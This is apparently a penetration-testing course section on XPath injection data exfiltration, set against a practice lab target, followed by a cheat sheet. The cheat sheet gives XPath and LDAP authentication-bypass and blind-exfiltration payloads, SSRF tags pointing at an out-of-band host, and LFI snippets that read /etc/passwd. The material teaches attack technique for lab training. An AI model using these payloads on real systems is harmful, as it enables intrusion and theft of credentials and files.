Injection Attacks

XPath - Data Exfiltration

Now that we have discussed bypassing authentication using XPath injection in the previous section, we will focus on data exfiltration in this section. Specifically, we will discuss how to manipulate XPath queries such that we access arbitrary data from XML documents, using techniques similar to UNION-based SQL injections.

Simple Data Exfiltration

To demonstrate data exfiltration via XPath injection in a simple base scenario, let us consider a web application that allows us to query data about the streets in San Francisco. We can enter a search query and choose between a long and short street name. The web application displays all streets in San Francisco that match our query:

Looking at the request, we can see that the search query is sent in the GET parameter q, while our choice of a long/short street name is transmitted in the GET parameter f:

The web application returns all streets that contain our search query as a substring. The parameter f seems to control what property of the matching streets is displayed, which is either the complete street name or a shortened version. This reveals two node names: fullstreetname and streetname. To exploit XPath injection vulnerabilities successfully, it is crucial to attempt to understand/depict the structure of the XPath query and the accompanying XML document being queried by the web application, similar to what is done when exploiting SQL injection vulnerabilities.

From the web application's behavior, we can deduce information about the XPath query that is performed. Since we do not know the names of the element nodes in the XML document, we will denote the path by single character placeholder names a, b, c, and d. The query most likely looks like this:

/a/b/c/[contains(d/text(), 'BAR')]/fullstreetname

Note: We do not know whether the depth of the XML schema is three like depicted above (/a/b/c). We will discuss how to determine the schema depth in the next section.

In this case, the search string we provide in the GET parameter q is inserted in the predicate that filters the street name using the contains function. After that, the GET parameter f determines the property the web application displays from all matching streets, which is why it is appended at the end of the query.

From the above query, we know the XML document has to look similar to this (again, we do not know the node names, so we use the same placeholder names as above):

<a>
	<b>
		<c>
			<d>???</d>
			<streetname>BARCELONA</streetname>
			<fullstreetname>BARCELONA AVE</fullstreetname>
		</c>
	</b>
</a>

Confirming XPath Injection

We can confirm XPath injection by sending the payload SOMETHINGINVALID') or ('1'='1 in the q parameter. This would result in the following XPath query:

/a/b/c/[contains(d/text(), 'SOMETHINGINVALID') or ('1'='1')]

While our provided substring is invalid, the injected or clause evaluates to true such that the predicate becomes universally true. Therefore, it matches all nodes at that depth. If we send this payload, the web application responds with all street names, thus confirming the XPath injection vulnerability:

Exfiltrating Data

How can we exploit this XPath injection to exfiltrate data apart from the street data? The easiest way is to construct a query that returns the entire XML document so that we can search it for interesting information. There are multiple different ways to achieve this. However, the simplest is probably to append a new query that returns all text nodes. We can do this with a request like this:

GET /index.php?q=SOMETHINGINVALID&f=fullstreetname+|+//text() HTTP/1.1
Host: xpath-exfil.htb

The web application will then execute the following query:

/a/b/c/[contains(d/text(), 'SOMETHINGINVALID')]/fullstreetname | //text()

We are appending a second query with the | operator, similar to a UNION-based SQL injection. The second query, //text(), returns all text nodes in the XML document. Therefore, the response contains all data stored in the XML document. Depending on the size of the XML document, the response can be pretty large. Thus it may take some time to look through the data carefully. In our example, we can find a user data set at the end of the document after the data set containing information about the streets of San Francisco:

Thus, we successfully exploited XPath injection to exfiltrate the entire XML document.

We could also achieve the same result by using this payload in the q parameter: SOMETHINGINVALID') or ('1'='1 and setting the f parameter to ../../..//text(). This would result in the following XPath query:

/a/b/c/[contains(d/text(), 'SOMETHINGINVALID') or ('1'='1')]/../../..//text()

The predicate is universally true due to our injected or clause. Furthermore, our payload injected into the f parameter moves back up to the document's root and selects all text nodes, just like our previous payload. Thus, this query also returns the entire XML document.

/ 1 spawns left

Waiting to start...

Questions

Answer the question(s) below to complete this Section and earn cubes!

Target: Click here to spawn the target system!

+ 7 Try to use what you learned in this section to exfiltrate the flag.

+10 Streak pts

Previous Next

Go to Questions

Introduction to Injection Attacks

Skills Assessment

My Workstation

OFFLINE

/ 1 spawns left

Cheat Sheet

The cheat sheet is a useful command reference for this module.

XPath Injection

XPath Syntax

Nodes:

Query	Explanation
`module`	Select all `module` child nodes of the context node
`/`	Select the document root node
`//`	Select descendant nodes of the context node
`.`	Select the context node
`..`	Select the parent node of the context node
`@difficulty`	Select the `difficulty` attribute node of the context node
`text()`	Select all text node child nodes of the context node

Predicates:

Query	Explanation
`/academy_modules/module[1]`	Select the first `module` child node of the `academy_modules` node
`/academy_modules/module[position()=1]`	Equivalent to the above query
`/academy_modules/module[last()]`	Select the last `module` child node of the `academy_modules` node
`/academy_modules/module[position()<3]`	Select the first two `module` child nodes of the `academy_modules` node
`//module[tier=2]/title/text()`	Select the `title` of all modules where the `tier` element node equals `2`
`//module/author[@co-author]/../title`	Select the `title` of all modules where the `author` element node has a `co-author` attribute node
`//module/tier[@difficulty="medium"]/..`	Select all modules where the `tier` element node has a `difficulty` attribute node set to `medium`

Predicate Operands:

Operand	Explanation
`+`	Addition
`-`	Subtraction
`*`	Multiplication
`div`	Division
`=`	Equal
`!=`	Not Equal
`<`	Less than
`<=`	Less than or Equal
`>`	Greater than
`>=`	Greater than or Equal
`or`	Logical Or
`and`	Logical And
`mod`	Modulus

Wildcards:

Query	Explanation
`node()`	Matches any node
`*`	Matches any `element` node
`@*`	Matches any `attribute` node

Union:

Query	Explanation
`//module[tier=2]/title/text() \| //module[tier=3]/title/text()`	Select the title of all modules in tiers `2` and `3`

Authentication Bypass

Description	Username	Query
Regular Authentication	`htb-stdnt`	`/users/user[username/text()='htb-stdnt' and password/text()='295362c2618a05ba3899904a6a3f5bc0']`
Bypass Authentication with known username	`admin' or '1'='1`	`/users/user[username/text()='admin' or '1'='1' and password/text()='21232f297a57a5a743894a0e4a801fc3']`
Bypass Authentication by position	`' or position()=1 or '`	`/users/user[username/text()='' or position()=1 or '' and password/text()='21232f297a57a5a743894a0e4a801fc3']`
Bypass Authentication by substring	`' or contains(.,'admin') or '`	`/users/user[username/text()='' or contains(.,'admin') or '' and password/text()='21232f297a57a5a743894a0e4a801fc3']`

Data Exfiltration

Unrestricted:

Leak entire XML document via union injection: | //text()

Restricted:

Determine schema depth via chain of wildcards /*[1]
iterate through XML schema by increasing the indices to exfiltrate the entire document step-by-step

Blind Data Exfiltration

Description	Payload	Query
Exfiltrating Node Name's Length	`invalid' or string-length(name(/*[1]))=1 and '1'='1`	`/users/user[username='invalid' or string-length(name(/*[1]))=1 and '1'='1']`
Exfiltrating Node Name	`invalid' or substring(name(/*[1]),1,1)='a' and '1'='1`	`/users/user[username='invalid' or substring(name(/*[1]),1,1)='a' and '1'='1']`
Exfiltrating Number of Child Nodes	`invalid' or count(/[1]/)=1 and '1'='1`	`/users/user[username='invalid' or count(/[1]/)=1 and '1'='1']`
Exfiltrating Value Length	`invalid' or string-length(/users/user[1]/username)=1 and '1'='1`	`/users/user[username='invalid' or string-length(/users/user[1]/username)=1 and '1'='1']`
Exfiltrating Value	`invalid' or substring(/users/user[1]/username,1,1)='a' and '1'='1`	`/users/user[username='invalid' or substring(/users/user[1]/username,1,1)='a' and '1'='1']`

Time-based

Force the web application to iterate over the entire XML document exponentially:

count((//.)[count((//.))])

Determine whether the first letter of the "username" is "a" based on the time it takes: if it is, the query will utilize a significant processing time, otherwise, it won't.

invalid' or substring(/users/user[1]/username,1,1)='a' and count((//.)[count((//.))]) and '1'='1

LDAP Injection

LDAP Search Filter Syntax

Name	Operand	Example	Example Description
Equality	`=`	`(name=Kaylie)`	Matches all entries that contain a `name` attribute with the value `Kaylie`
Greater-Or-Equal	`>=`	`(uid>=10)`	Matches all entries that contain a `uid` attribute with a value greater-or-equal to `10`
Less-Or-Equal	`<=`	`(uid<=10)`	Matches all entries that contain a `uid` attribute with a value less-or-equal to `10`
Approximate Match	`~=`	`(name~=Kaylie)`	Matches all entries that contain a `name` attribute with approximately the value `Kaylie`
And	`(&()())`	`(&(name=Kaylie)(title=Manager))`	Matches all entries that contain a `name` attribute with the value `Kaylie` and a `title` attribute with the value `Manager`
Or	`(\|()())`	`(\|(name=Kaylie)(title=Manager))`	Matches all entries that contain a `name` attribute with the value `Kaylie` or a `title` attribute with the value `Manager`
Not	`(!())`	`(!(name=Kaylie))`	Matches all entries that contain a `name` attribute with a value different from `Kaylie`
True	`(&)`	`(&)`	Universal True
False	`(\|)`	`(\|)`	Universal False
Wildcard	`*`	`(name=a)`	Matches all entries that contain a name attribute that contains an `a`

Authentication Bypass

Description	Username	Password	Search Filter
Regular Authentication	`admin`	`admin`	`(&(uid=admin)(userPassword=admin))`
Wildcard Bypass	`*`	`*`	`(&(uid=)(userPassword=))`
Wildcard Bypass targeting specific user	`admin*`	`*`	`(&(uid=admin)(userPassword=))`
Universal True Bypass	`admin)(\|(&`	`invalid)`	`(&(uid=admin)(\|(&)(userPassword=invalid)))`

Data Exfiltration

Brute-Force data character-by-character:

Username	Password	Query
`htb-stdnt`	`*`	`(&(uid=htb-stdnt)(userPassword=*))`
`htb-stdnt`	`p*`	`(&(uid=htb-stdnt)(userPassword=p*))`
`htb-stdnt`	`p@*`	`(&(uid=htb-stdnt)(userPassword=p@*))`
`htb-stdnt`	`p@s*`	`(&(uid=htb-stdnt)(userPassword=p@s*))`
`htb-stdnt`	`p@ss*`	`(&(uid=htb-stdnt)(userPassword=p@ss*))`
`htb-stdnt`	`p@ssw*`	`(&(uid=htb-stdnt)(userPassword=p@ssw*))`
`htb-stdnt`	`p@ssw0*`	`(&(uid=htb-stdnt)(userPassword=p@ssw0*))`
`htb-stdnt`	`p@ssw0r*`	`(&(uid=htb-stdnt)(userPassword=p@ssw0r*))`
`htb-stdnt`	`p@ssw0rd*`	`(&(uid=htb-stdnt)(userPassword=p@ssw0rd*))`
`htb-stdnt`	`p@ssw0rd`	`(&(uid=htb-stdnt)(userPassword=p@ssw0rd))`

PDF Generation Vulnerabilities

Determining the PDF Generation Library

$ exiftool invoice.pdf 
<SNIP>
Creator                         : wkhtmltopdf 0.12.6.1
Producer                        : Qt 4.8.7
<SNIP>

Server-Side Request Forgery (SSRF) Payloads

<img src="http://cf8kzfn2vtc0000n9fbgg8wj9zhyyyyyb.oast.fun/ssrftest1"/>
<link rel="stylesheet" href="http://cf8kzfn2vtc0000n9fbgg8wj9zhyyyyyb.oast.fun/ssrftest2">
<iframe src="http://cf8kzfn2vtc0000n9fbgg8wj9zhyyyyyb.oast.fun/ssrftest3"></iframe>

Local File Inclusion (LFI) Payloads

<script>
	x = new XMLHttpRequest();
	x.onload = function(){
		document.write(this.responseText)
	};
	x.open("GET", "file:///etc/passwd");
	x.send();
</script>

<iframe src="file:///etc/passwd" width="800" height="500"></iframe>
<object data="file:///etc/passwd" width="800" height="500">
<portal src="file:///etc/passwd" width="800" height="500">

<annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="LFI" />